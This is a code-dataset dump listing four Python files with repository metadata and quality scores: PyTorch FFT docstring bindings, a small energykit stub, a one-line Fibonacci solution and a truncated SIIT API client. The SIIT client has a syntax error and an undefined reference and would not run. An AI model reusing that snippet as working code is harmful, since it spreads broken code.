hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e4bcc35464b2e898be26ac13e2e1fbe14c18c03 | 22,309 | py | Python | torch/fft/__init__.py | jsun94/nimble | e5c899a69677818b1becc58100577441e15ede13 | [
"BSD-3-Clause"
] | 206 | 2020-11-28T22:56:38.000Z | 2022-03-27T02:33:04.000Z | torch/fft/__init__.py | jsun94/nimble | e5c899a69677818b1becc58100577441e15ede13 | [
"BSD-3-Clause"
] | 19 | 2020-12-09T23:13:14.000Z | 2022-01-24T23:24:08.000Z | torch/fft/__init__.py | jsun94/nimble | e5c899a69677818b1becc58100577441e15ede13 | [
"BSD-3-Clause"
] | 28 | 2020-11-29T15:25:12.000Z | 2022-01-20T02:16:27.000Z | import sys
import torch
from torch._C import _add_docstr, _fft # type: ignore
Tensor = torch.Tensor  # local alias for torch.Tensor, used by this module's signatures
# Note: This not only adds the doc strings for the spectral ops, but
# connects the torch.fft Python namespace to the torch._C._fft builtins.
# Bind the reference documentation for the 1-D FFT builtin and expose it in
# the torch.fft namespace (torch._C._fft provides the implementation).
# Fix: the second example previously called bare `tensor(...)`, which is not
# defined; it must be `torch.tensor(...)`.
fft = _add_docstr(_fft.fft_fft, r"""
fft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional discrete Fourier transform of :attr:`input`.
Note:
The Fourier domain representation of any real signal satisfies the
Hermitian property: `X[i] = conj(X[-i])`. This function always returns both
the positive and negative frequency terms even though, for real inputs, the
negative frequencies are redundant. :func:`~torch.fft.rfft` returns the
more compact one-sided representation where only the positive frequencies
are returned.
Args:
input (Tensor): the input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the FFT.
dim (int, optional): The dimension along which to take the one dimensional FFT.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.fft`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the FFT orthonormal)
Calling the backward transform (:func:`~torch.fft.ifft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ifft`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> t = torch.arange(4)
>>> t
tensor([0, 1, 2, 3])
>>> torch.fft.fft(t)
tensor([ 6.+0.j, -2.+2.j, -2.+0.j, -2.-2.j])
>>> t = torch.tensor([0.+1.j, 2.+3.j, 4.+5.j, 6.+7.j])
>>> torch.fft.fft(t)
tensor([12.+16.j, -8.+0.j, -4.-4.j, 0.-8.j])
""")
# Bind the reference documentation for the 1-D inverse FFT builtin and
# expose it as torch.fft.ifft.
ifft = _add_docstr(_fft.fft_ifft, r"""
ifft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional inverse discrete Fourier transform of :attr:`input`.
Args:
input (Tensor): the input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the IFFT.
dim (int, optional): The dimension along which to take the one dimensional IFFT.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.ifft`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the IFFT orthonormal)
Calling the forward transform (:func:`~torch.fft.fft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ifft`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.tensor([ 6.+0.j, -2.+2.j, -2.+0.j, -2.-2.j])
>>> torch.fft.ifft(t)
tensor([0.+0.j, 1.+0.j, 2.+0.j, 3.+0.j])
""")
# Bind the reference documentation for the N-D FFT builtin and expose it as
# torch.fft.fftn.
# Fix: the example defines `x` but previously called `torch.fft.fftn(t)`
# with an undefined `t`; the call now uses `x`.
fftn = _add_docstr(_fft.fft_fftn, r"""
fftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the N dimensional discrete Fourier transform of :attr:`input`.
Note:
The Fourier domain representation of any real signal satisfies the
Hermitian property: ``X[i_1, ..., i_n] = conj(X[-i_1, ..., -i_n])``. This
function always returns all positive and negative frequency terms even
though, for real inputs, half of these values are redundant.
:func:`~torch.fft.rfftn` returns the more compact one-sided representation
where only the positive frequencies of the last dimension are returned.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the FFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Default: ``s = [input.size(d) for d in dim]``
dim (Tuple[int], optional): Dimensions to be transformed.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.fftn`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the FFT orthonormal)
Where ``n = prod(s)`` is the logical FFT size.
Calling the backward transform (:func:`~torch.fft.ifftn`) with the same
normalization mode will apply an overall normalization of ``1/n``
between the two transforms. This is required to make
:func:`~torch.fft.ifftn` the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> x = torch.rand(10, 10, dtype=torch.complex64)
>>> fftn = torch.fft.fftn(x)
The discrete Fourier transform is separable, so :func:`~torch.fft.fftn`
here is equivalent to two one-dimensional :func:`~torch.fft.fft` calls:
>>> two_ffts = torch.fft.fft(torch.fft.fft(x, dim=0), dim=1)
>>> torch.allclose(fftn, two_ffts)
""")
# Bind the reference documentation for the N-D inverse FFT builtin and
# expose it as torch.fft.ifftn.
# Fix: the example defines `x` but previously called `torch.fft.ifftn(t)`
# with an undefined `t`; the call now uses `x`.
ifftn = _add_docstr(_fft.fft_ifftn, r"""
ifftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the N dimensional inverse discrete Fourier transform of :attr:`input`.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the IFFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Default: ``s = [input.size(d) for d in dim]``
dim (Tuple[int], optional): Dimensions to be transformed.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.ifftn`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the IFFT orthonormal)
Where ``n = prod(s)`` is the logical IFFT size.
Calling the forward transform (:func:`~torch.fft.fftn`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ifftn`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> x = torch.rand(10, 10, dtype=torch.complex64)
>>> ifftn = torch.fft.ifftn(x)
The discrete Fourier transform is separable, so :func:`~torch.fft.ifftn`
here is equivalent to two one-dimensional :func:`~torch.fft.ifft` calls:
>>> two_iffts = torch.fft.ifft(torch.fft.ifft(x, dim=0), dim=1)
>>> torch.allclose(ifftn, two_iffts)
""")
# Bind the reference documentation for the real-input FFT builtin and expose
# it as torch.fft.rfft.
# Fix: grammar in the closing note ("is it's own" -> "is its own").
rfft = _add_docstr(_fft.fft_rfft, r"""
rfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional Fourier transform of real-valued :attr:`input`.
The FFT of a real signal is Hermitian-symmetric, ``X[i] = conj(X[-i])`` so
the output contains only the positive frequencies below the Nyquist frequency.
To compute the full output, use :func:`~torch.fft.fft`
Args:
input (Tensor): the real input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the real FFT.
dim (int, optional): The dimension along which to take the one dimensional real FFT.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.rfft`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the FFT orthonormal)
Calling the backward transform (:func:`~torch.fft.irfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfft`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> t = torch.arange(4)
>>> t
tensor([0, 1, 2, 3])
>>> torch.fft.rfft(t)
tensor([ 6.+0.j, -2.+2.j, -2.+0.j])
Compare against the full output from :func:`~torch.fft.fft`:
>>> torch.fft.fft(t)
tensor([ 6.+0.j, -2.+2.j, -2.+0.j, -2.-2.j])
Notice that the symmetric element ``T[-1] == T[1].conj()`` is omitted.
At the Nyquist frequency ``T[-2] == T[2]`` is its own symmetric pair,
and therefore must always be real-valued.
""")
# Bind the reference documentation for the inverse real FFT builtin and
# expose it as torch.fft.irfft.
irfft = _add_docstr(_fft.fft_irfft, r"""
irfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the inverse of :func:`~torch.fft.rfft`.
:attr:`input` is interpreted as a one-sided Hermitian signal in the Fourier
domain, as produced by :func:`~torch.fft.rfft`. By the Hermitian property, the
output will be real-valued.
Note:
Some input frequencies must be real-valued to satisfy the Hermitian
property. In these cases the imaginary component will be ignored.
For example, any imaginary component in the zero-frequency term cannot
be represented in a real output and so will always be ignored.
Note:
The correct interpretation of the Hermitian input depends on the length of
the original data, as given by :attr:`n`. This is because each input shape
could correspond to either an odd or even length signal. By default, the
signal is assumed to be even length and odd signals will not round-trip
properly. So, it is recommended to always pass the signal length :attr:`n`.
Args:
input (Tensor): the input tensor representing a half-Hermitian signal
n (int, optional): Output signal length. This determines the length of the
output signal. If given, the input will either be zero-padded or trimmed to this
length before computing the real IFFT.
Defaults to even output: ``n=2*(input.size(dim) - 1)``.
dim (int, optional): The dimension along which to take the one dimensional real IFFT.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.irfft`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the real IFFT orthonormal)
Calling the forward transform (:func:`~torch.fft.rfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfft`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.arange(5)
>>> t
tensor([0, 1, 2, 3, 4])
>>> T = torch.fft.rfft(t)
>>> T
tensor([10.0000+0.0000j, -2.5000+3.4410j, -2.5000+0.8123j])
Without specifying the output length to :func:`~torch.fft.irfft`, the output
will not round-trip properly because the input is odd-length:
>>> torch.fft.irfft(T)
tensor([0.6250, 1.4045, 3.1250, 4.8455])
So, it is recommended to always pass the signal length :attr:`n`:
>>> torch.fft.irfft(T, t.numel())
tensor([0.0000, 1.0000, 2.0000, 3.0000, 4.0000])
""")
# Bind the reference documentation for the N-D real-input FFT builtin and
# expose it as torch.fft.rfftn.
# Fix: the example defines `t` but previously called `torch.fft.rfft(x, dim=1)`
# with an undefined `x`; the call now uses `t`.
rfftn = _add_docstr(_fft.fft_rfftn, r"""
rfftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the N-dimensional discrete Fourier transform of real :attr:`input`.
The FFT of a real signal is Hermitian-symmetric,
``X[i_1, ..., i_n] = conj(X[-i_1, ..., -i_n])`` so the full
:func:`~torch.fft.fftn` output contains redundant information.
:func:`~torch.fft.rfftn` instead omits the negative frequencies in the
last dimension.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the real FFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Default: ``s = [input.size(d) for d in dim]``
dim (Tuple[int], optional): Dimensions to be transformed.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.rfftn`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the real FFT orthonormal)
Where ``n = prod(s)`` is the logical FFT size.
Calling the backward transform (:func:`~torch.fft.irfftn`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfftn`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> t = torch.rand(10, 10)
>>> rfftn = torch.fft.rfftn(t)
>>> rfftn.size()
torch.Size([10, 6])
Compared against the full output from :func:`~torch.fft.fftn`, we have all
elements up to the Nyquist frequency.
>>> fftn = torch.fft.fftn(t)
>>> torch.allclose(fftn[..., :6], rfftn)
True
The discrete Fourier transform is separable, so :func:`~torch.fft.rfftn`
here is equivalent to a combination of :func:`~torch.fft.fft` and
:func:`~torch.fft.rfft`:
>>> two_ffts = torch.fft.fft(torch.fft.rfft(t, dim=1), dim=0)
>>> torch.allclose(rfftn, two_ffts)
""")
# Bind the reference documentation for the N-D inverse real FFT builtin and
# expose it as torch.fft.irfftn.
irfftn = _add_docstr(_fft.fft_irfftn, r"""
irfftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the inverse of :func:`~torch.fft.rfftn`.
:attr:`input` is interpreted as a one-sided Hermitian signal in the Fourier
domain, as produced by :func:`~torch.fft.rfftn`. By the Hermitian property, the
output will be real-valued.
Note:
Some input frequencies must be real-valued to satisfy the Hermitian
property. In these cases the imaginary component will be ignored.
For example, any imaginary component in the zero-frequency term cannot
be represented in a real output and so will always be ignored.
Note:
The correct interpretation of the Hermitian input depends on the length of
the original data, as given by :attr:`s`. This is because each input shape
could correspond to either an odd or even length signal. By default, the
signal is assumed to be even length and odd signals will not round-trip
properly. So, it is recommended to always pass the signal shape :attr:`s`.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the real FFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Defaults to even output in the last dimension:
``s[-1] = 2*(input.size(dim[-1]) - 1)``.
dim (Tuple[int], optional): Dimensions to be transformed.
The last dimension must be the half-Hermitian compressed dimension.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.irfftn`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the real IFFT orthonormal)
Where ``n = prod(s)`` is the logical IFFT size.
Calling the forward transform (:func:`~torch.fft.rfftn`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfftn`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.rand(10, 9)
>>> T = torch.fft.rfftn(t)
Without specifying the output length to :func:`~torch.fft.irfft`, the output
will not round-trip properly because the input is odd-length in the last
dimension:
>>> torch.fft.irfftn(T).size()
torch.Size([10, 10])
So, it is recommended to always pass the signal shape :attr:`s`.
>>> roundtrip = torch.fft.irfftn(T, t.size())
>>> roundtrip.size()
torch.Size([10, 9])
>>> torch.allclose(roundtrip, t)
True
""")
# Bind the reference documentation for the Hermitian FFT builtin and expose
# it as torch.fft.hfft.
# NOTE(review): the example outputs print complex values as ``+-0.0000j``,
# which looks like garbled sign formatting from extraction -- confirm
# against the output of a current torch build before relying on it.
hfft = _add_docstr(_fft.fft_hfft, r"""
hfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional discrete Fourier transform of a Hermitian
symmetric :attr:`input` signal.
Note:
:func:`~torch.fft.hfft`/:func:`~torch.fft.ihfft` are analogous to
:func:`~torch.fft.rfft`/:func:`~torch.fft.irfft`. The real FFT expects
a real signal in the time-domain and gives a Hermitian symmetry in the
frequency-domain. The Hermitian FFT is the opposite; Hermitian symmetric in
the time-domain and real-valued in the frequency-domain. For this reason,
special care needs to be taken with the length argument :attr:`n`, in the
same way as with :func:`~torch.fft.irfft`.
Note:
Because the signal is Hermitian in the time-domain, the result will be
real in the frequency domain. Note that some input frequencies must be
real-valued to satisfy the Hermitian property. In these cases the imaginary
component will be ignored. For example, any imaginary component in
``input[0]`` would result in one or more complex frequency terms which
cannot be represented in a real output and so will always be ignored.
Note:
The correct interpretation of the Hermitian input depends on the length of
the original data, as given by :attr:`n`. This is because each input shape
could correspond to either an odd or even length signal. By default, the
signal is assumed to be even length and odd signals will not round-trip
properly. So, it is recommended to always pass the signal length :attr:`n`.
Args:
input (Tensor): the input tensor representing a half-Hermitian signal
n (int, optional): Output signal length. This determines the length of the
real output. If given, the input will either be zero-padded or trimmed to this
length before computing the Hermitian FFT.
Defaults to even output: ``n=2*(input.size(dim) - 1)``.
dim (int, optional): The dimension along which to take the one dimensional Hermitian FFT.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.hfft`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the Hermitian FFT orthonormal)
Calling the backward transform (:func:`~torch.fft.ihfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ihfft`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
Taking a real-valued frequency signal and bringing it into the time domain
gives Hermitian symmetric output:
>>> import torch.fft
>>> t = torch.arange(5)
>>> t
tensor([0, 1, 2, 3, 4])
>>> T = torch.fft.ifft(t)
>>> T
tensor([ 2.0000+-0.0000j, -0.5000-0.6882j, -0.5000-0.1625j, -0.5000+0.1625j,
-0.5000+0.6882j])
Note that ``T[1] == T[-1].conj()`` and ``T[2] == T[-2].conj()`` is
redundant. We can thus compute the forward transform without considering
negative frequencies:
>>> torch.fft.hfft(T[:3], n=5)
tensor([0., 1., 2., 3., 4.])
Like with :func:`~torch.fft.irfft`, the output length must be given in order
to recover an even length output:
>>> torch.fft.hfft(T[:3])
tensor([0.5000, 1.1236, 2.5000, 3.8764])
""")
# Bind the reference documentation for the inverse Hermitian FFT builtin and
# expose it as torch.fft.ihfft.
# NOTE(review): same ``+-0.0000j`` display oddity as in the hfft example --
# confirm against a current torch build.
ihfft = _add_docstr(_fft.fft_ihfft, r"""
ihfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the inverse of :func:`~torch.fft.hfft`.
:attr:`input` must be a real-valued signal, interpreted in the Fourier domain.
The IFFT of a real signal is Hermitian-symmetric, ``X[i] = conj(X[-i])``.
:func:`~torch.fft.ihfft` represents this in the one-sided form where only the
positive frequencies below the Nyquist frequency are included. To compute the
full output, use :func:`~torch.fft.ifft`.
Args:
input (Tensor): the real input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the Hermitian IFFT.
dim (int, optional): The dimension along which to take the one dimensional Hermitian IFFT.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.ihfft`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the IFFT orthonormal)
Calling the forward transform (:func:`~torch.fft.hfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ihfft`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.arange(5)
>>> t
tensor([0, 1, 2, 3, 4])
>>> torch.fft.ihfft(t)
tensor([ 2.0000+-0.0000j, -0.5000-0.6882j, -0.5000-0.1625j])
Compare against the full output from :func:`~torch.fft.ifft`:
>>> torch.fft.ifft(t)
tensor([ 2.0000+-0.0000j, -0.5000-0.6882j, -0.5000-0.1625j, -0.5000+0.1625j,
-0.5000+0.6882j])
""")
| 40.414855 | 94 | 0.658568 | 3,318 | 22,309 | 4.409885 | 0.086498 | 0.053034 | 0.049207 | 0.028704 | 0.822239 | 0.803923 | 0.79825 | 0.785539 | 0.770913 | 0.751982 | 0 | 0.023888 | 0.211888 | 22,309 | 551 | 95 | 40.488203 | 0.808327 | 0.006724 | 0 | 0.557416 | 0 | 0.07177 | 0.975536 | 0.084044 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.011962 | 0.0311 | 0 | 0.0311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3e594f11d6b3e167e32e72ad535edab27a157474 | 157 | py | Python | energykit/plugwise/datasource.py | interactiveinstitute/watthappened | 0c7ab7a5ae7f7a0f567c32a524b3c27294d1233f | [
"MIT"
] | null | null | null | energykit/plugwise/datasource.py | interactiveinstitute/watthappened | 0c7ab7a5ae7f7a0f567c32a524b3c27294d1233f | [
"MIT"
] | null | null | null | energykit/plugwise/datasource.py | interactiveinstitute/watthappened | 0c7ab7a5ae7f7a0f567c32a524b3c27294d1233f | [
"MIT"
] | null | null | null | import energykit
# TODO(sander) Connect to a Plugwise stick using its serial device path.
class DataSource(energykit.DataSource, energykit.PubSub):
pass
| 22.428571 | 72 | 0.796178 | 21 | 157 | 5.952381 | 0.857143 | 0.304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140127 | 157 | 6 | 73 | 26.166667 | 0.925926 | 0.44586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
3e8d1a8a0f8da0c82fb940be56e7aacc2e6578f0 | 72 | py | Python | ACM-Solution/FIBON.py | wasi0013/Python-CodeBase | 4a7a36395162f68f84ded9085fa34cc7c9b19233 | [
"MIT"
] | 2 | 2016-04-26T15:40:40.000Z | 2018-07-18T10:16:42.000Z | ACM-Solution/FIBON.py | wasi0013/Python-CodeBase | 4a7a36395162f68f84ded9085fa34cc7c9b19233 | [
"MIT"
] | 1 | 2016-04-26T15:44:15.000Z | 2016-04-29T14:44:40.000Z | ACM-Solution/pi.py | wasi0013/Python-CodeBase | 4a7a36395162f68f84ded9085fa34cc7c9b19233 | [
"MIT"
] | 1 | 2018-10-02T16:12:19.000Z | 2018-10-02T16:12:19.000Z | exec('print(int(((1+5**.5)/2)**int(input())/5**.5+.5));'*int(input()))
| 36 | 71 | 0.486111 | 14 | 72 | 2.5 | 0.5 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.027778 | 72 | 1 | 72 | 72 | 0.4 | 0 | 0 | 0 | 0 | 1 | 0.690141 | 0.690141 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
e43a45a510780a871b3f2123bb191aecc9359c55 | 19,914 | py | Python | SIIT_API.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | SIIT_API.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | SIIT_API.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | import requests
def request(url):
    """GET ``url`` and return the decoded JSON body.

    Falls back to returning an ``"Error code:<status>"`` string when the
    response body is not valid JSON.
    """
    response = requests.get(url)
    try:
        payload = response.json()
    except ValueError:
        # Non-JSON body: surface the HTTP status instead of raising.
        return "Error code:" + str(response.status_code)
    return payload
class API_client(object):
def __init__(self, key=None,
address= app.config['DEFAULT_SERVER_HOST_ADDRESS']+"/api/v1.0/"
self.key = key
self.address = address
def distance_coord(self, lat = None, lon = None, cat = None, conc = None, dist = None, num_poi=None, order=None):
if lat is None or lon is None:
return ("Error, missing Latitude or Longitude")
if dist is None:
return ("Error, missing distance")
